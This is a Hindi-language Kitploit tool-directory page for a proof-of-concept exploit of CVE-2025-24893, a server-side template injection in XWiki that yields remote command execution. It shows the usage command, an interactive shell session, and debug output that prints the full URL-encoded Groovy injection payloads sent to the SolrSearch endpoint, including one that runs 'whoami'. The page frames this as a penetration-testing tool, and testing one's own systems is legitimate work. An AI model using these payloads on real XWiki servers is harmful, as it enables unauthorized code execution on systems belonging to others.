Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24893 — CVE-2025-24893 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो XWiki में एक SSTI भेद्यता है, जो रिमोट कमांड निष्पादन के लिए एक इंटरैक्टिव शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/y2f05p2w/cve-2025-24893
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHuby2f05p2w/cve-2025-24893

CVE-2025-24893

CVE-2025-24893 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो XWiki में एक SSTI भेद्यता है, जो रिमोट कमांड निष्पादन के लिए एक इंटरैक्टिव शेल प्रदान करता है।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

जानकारी

यह PoC पहले SSTI का परीक्षण करता है और यदि यह काम करता है। यह लूप में चलता है और आपको दूरस्थ रूप से कमांड चलाने की अनुमति देता है।

exec और shell कमांड वर्तमान में समान कार्य करते हैं।

उपयोग

कनेक्ट करना

root@kitploit:~
python3 poc.py <target>

उदाहरण

debug को False (डिफ़ॉल्ट) पर सेट करके

root@kitploit:~
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki

debug को True पर सेट करके

स्क्रिप्ट के शीर्ष पर मौजूद debug फ्लैग आपको उत्पन्न URLs दिखाएगा। यह एक debug.log फ़ाइल बनाएगा जिसमें अनुरोध का कच्चा प्रतिक्रिया होगा।

root@kitploit:~
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
टूल डाउनलोड करें